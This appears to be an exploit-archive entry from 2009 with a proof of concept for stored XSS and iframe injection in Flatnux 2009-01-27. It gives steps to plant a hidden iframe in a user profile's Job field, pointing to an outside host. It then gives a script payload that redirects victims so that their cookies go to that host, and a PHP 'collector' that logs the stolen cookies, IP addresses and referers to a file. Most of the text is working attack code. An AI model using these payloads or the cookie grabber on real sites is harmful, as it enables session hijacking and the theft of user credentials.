[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC
# Published : 2009-02-02
# Author : Alfons Luja
# Previous Title : SMA-DB 0.3.12 (RFI/XSS) Multiple Remote Vulnerabilities
# Next Title : AJA Portal 1.2 Local File Inclusion Vulnerabilities (win)
/*
- Flatnux-2009-01-27 XSS/Iframe injection p0c
+ 1] Create acount
+ 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
- Set iframe in the Job fields
(Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>)
+ 3] Now m4k3 frieNdship witch Sheep
Greetings : cOndemned , sid.psycho , wszyscy kt?3rych nik?3w nie umie wym?3wi?? :P
and Biggest 4 g0rion l0l
"... droga jest wa??niejsza od celu .... :P"
http://www.wrzuta.pl/audio/iL4UkPk6YK/
Alfons Luja
*/
<script type="text/javascript">
path = "http://localhost/~flatnux/index.php?mod=02_Flatforum"><script>location.href="http://0xc00000fdh.boo.pl/collector.php?kuka="%2Bdocument.cookie;<%2Fscript>";
location.href = path;
</script>
/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
if(isset($_GET['kuka'])){
$gethim = $_GET['kuka'];
$data = "KUKI_GRABER:n";
$data.= date("dmY H:i:s")."n";
$data.= "REFERER: ".$_SERVER['HTTP_REFERER']."n";
$data.= "IP: ".$_SERVER['REMOTE_ADDR']."n";
$data.= "CIACHO: ".$gethim."n";
$hnd = fopen("KUKI_FLATNUX.TXT","a");
if(!hnd) exit(666);
flock($hnd,LOCK_EX);
fwrite($hnd,$data);
flock($hnd,LOCK_UN);
fclose($hnd);
}
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
# www.Syue.com [2009-02-02]